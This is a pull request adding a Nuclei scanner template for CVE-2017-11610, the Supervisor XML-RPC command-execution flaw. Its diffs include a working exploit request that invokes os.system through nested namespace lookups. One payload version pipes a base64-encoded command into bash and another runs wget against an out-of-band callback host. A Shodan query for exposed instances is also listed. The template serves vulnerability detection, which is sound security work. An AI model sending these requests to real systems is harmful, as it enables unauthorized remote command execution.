### PR TITLE
Added CVE-2017-11610.yaml template

### DIFF
--- a/cves/2017/CVE-2017-11610.yaml
+++ b/cves/2017/CVE-2017-11610.yaml
@@ -4,13 +4,14 @@ info:
   name: Supervisor XMLRPC Exec (CVE-2017-11610)
   author: notnotnotveg
   severity: critical
+  description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.
   reference:
     - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
     - https://nvd.nist.gov/vuln/detail/CVE-2017-11610
-  description: Typically runs on port tcp/9001
-  tags: cve,cve2017,rce,supervisor
   metadata:
     shodan-query: 'http.title:"Supervisor Status"'
+  tags: cve,cve2017,rce,supervisor,oast
+
 
 requests:
   - payloads:
@@ -29,22 +30,15 @@ requests:
           <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
           <params>
             <param>
-              <string>echo -n bHM= |base64 -d|nohup bash > /dev/null 2>&amp;1 &amp;</string>
+              <string>wget http://{{interactsh-url}}</string>
             </param>
           </params>
         </methodCall>
 
 
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
       - type: word
+        part: interactsh_protocol
+        name: http
         words:
-          - "<methodResponse>"
-        part: body
-      - type: word
-        words:
-          - "<int>0</int>"
-        part: body
+          - "http"

--- a/cves/2017/CVE-2017-11610.yaml
+++ b/cves/2017/CVE-2017-11610.yaml
@@ -1,0 +1,50 @@
+id: CVE-2017-11610
+
+info:
+  name: Supervisor XMLRPC Exec (CVE-2017-11610)
+  author: notnotnotveg
+  severity: critical
+  reference:
+    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11610
+  description: Typically runs on port tcp/9001
+  tags: cve,cve2017,rce,supervisor
+  metadata:
+    shodan-query: 'http.title:"Supervisor Status"'
+
+requests:
+  - payloads:
+
+    raw:
+      - |
+        POST /RPC2 HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/xml
+        Content-type: text/xml
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+        Content-Length:
+
+        <methodCall>
+          <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
+          <params>
+            <param>
+              <string>echo -n bHM= |base64 -d|nohup bash > /dev/null 2>&amp;1 &amp;</string>
+            </param>
+          </params>
+        </methodCall>
+
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "<methodResponse>"
+        part: body
+      - type: word
+        words:
+          - "<int>0</int>"
+        part: body


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2017-11610
- References:
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
https://nvd.nist.gov/vuln/detail/CVE-2017-11610


### Template Validation

I've validated this template locally?
Yes


#### Additional Details (leave it blank if not applicable)
This was tested across multiple versions of vulnerable Supervisor instances.
<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)